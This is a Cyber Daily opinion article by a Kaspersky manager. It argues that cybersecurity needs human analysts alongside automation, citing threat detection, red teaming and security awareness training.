Powered by MOMENTUM MEDIA
cyber daily logo
Breaking news and updates daily. Subscribe to our Newsletter

Why it’s impossible to completely automate cyber security

Margrith Appleby from Kaspersky outlines the challenges associated with cyber security automation.

user iconMargrith Appleby
Fri, 11 Feb 2022
Why it’s impossible to completely automate cyber security
expand image

Businesses have a dilemma. It’s no secret that comprehensive cybersecurity can be expensive but the risk of errors with using cheaper tools is very high, and insufficient security measures can lead to disastrous consequences, significantly affecting a business’ reputation and bottom line.

Automated incident prevention can be one solution, as it can reduce costs, eliminate the human mistake factor, and people tend to trust AI more than a human colleague. But in practice, effective cyber protection is only possible when you combine automated solutions with human effort.

Why? First of all, cyber criminals are human beings. Like all of us, they can make decisions based on a mix of cognitive processes and can quickly adapt. Attackers constantly come up with new ways to bypass security systems, invent and implement new sophisticated attack tactics and actively use people’s weaknesses to gain access to a company’s infrastructure.

============
============

Even the most sophisticated AI can’t combat the variety of malicious activities out there because it works on the basis of previously acquired and learned experience. Here are some examples of cyber security practices that require human involvement.

Detection of complex threats

These attacks usually consist of a series of separate and legitimate actions that could easily be confused with system administrator or common user actions. Fileless attacks, heavy use of LOLBAS tools, runtime encryption, downloaders and packers – are all widely used to help attackers bypass security solutions and controls. Even the most carefully tuned sensors cannot detect previously unknown malicious activities.

Artificial Intelligence that analyses telemetry from sensors also has limitations. It can’t collect and process all possible data or actions that occur at different times. Even if that was possible, there is another issue – situational awareness. A simple example: AI observes what it believes to be a human-driven APT, but it’s actually a dedicated employee conducting research. This could only be uncovered by contacting the customer. Situational awareness is crucial to differentiate true incidents from false-positive alerts, no matter if the alert logic is based on a particular attack technique behaviour pattern or anomaly analysis.

This doesn’t mean that AI is ineffective in terms of threat detection. In fact, it can successfully combat 100 per cent of known threats and, when properly configured, can significantly reduce the burden on analysts.

We recently developed a machine learning (ML) analyst for our Managed Detection and Response service. This supervised ML algorithm uses labelled historical data for the primary classification of alerts as false or true positives. All alerts from protected assets are initially processed by this and just over a third of activity comes out as a false positive. Anything that exceeds the threshold or specified filtration rule is sent to the security analyst team for examination, who evaluates them using additional methods and data suitable for that particular case (and which may not have been used by the AI). When the human analysts find the solution to the problem, they share it with the ML analyst to ensure the next case won’t be a challenge for the AI.

It’s a joint force approach. This requires special skills, high-grade analyst experience and constant algorithm adjustment. The good news is that it enables security teams to tackle even the most dangerous situations, such as the famous PrintNightmare vulnerability exploitation or MuddyWater APT attack and share those valuable detection scenarios with others.

Proactive manual threat hunting is also required when identifying new threats. Security teams can hunt out threats that are lying undiscovered but still active within a company’s infrastructure. It can identify current cyber criminal and cyber espionage activity in a network, understand the reasons behind these incidents and the possible sources, and effectively plan mitigation activities that will help avoid similar attacks.

To sum up, analysts have to constantly adjust and retrain the AI-based algorithm for it to detect new threats and to test the efficiency of the improvements.

Advanced security assessments

Assessments are crucial to gain a detailed perspective of a company’s cyber security readiness. There are automated solutions designed for this which can help discover publicly-known vulnerabilities among a strictly defined set of systems. Still, this service uses a database of already known security issues but can’t test security system resilience towards sophisticated attacks and unconventional adversaries’ behaviour.

For proper protection, a more advanced assessment processes should be implemented, such as penetration testing and red teaming which actually simulates a cyber attack. These are mostly manual and based on a specialist’s knowledge and experience, using a mix of techniques, tactics and procedures. Crucially, these services can be adjusted to the company’s specific cyber defence capabilities, imitating the real behaviour of attackers.

Security awareness

Attackers keep an eye on trends and act like good psychologists. You can be sure that each trigger – from the pandemic to Kanye West’s new album – will be used by adversaries to attract a potential victim through phishing emails and malicious websites.

Employees need to have a clear understanding of the importance of cyber security policies as well as the consequences of their actions. An awareness manual or test only used during onboarding is not enough.

The IT security team should keep an eye on the relevance of their security education and invent new and non-standard approaches to deliver crucial information to their colleagues. Or outsource these activities to a professional security awareness training team who would share updated information in an engaging way.

To wrap up, I’m not saying security teams should abandon automation nor fight against cyber criminals with their “bare hands” – particularly as attackers strive to be as effective as possible, often resorting to automated solutions themselves.

The truth lies somewhere in the middle. A smart mix of automated solutions with human creativity, skills and control can ensure a truly comprehensive cyber defence.

Margrith Appleby is the general manager of Kaspersky Australia & New Zealand.

newsletter
cyber daily subscribe
Be the first to hear the latest developments in the cyber industry.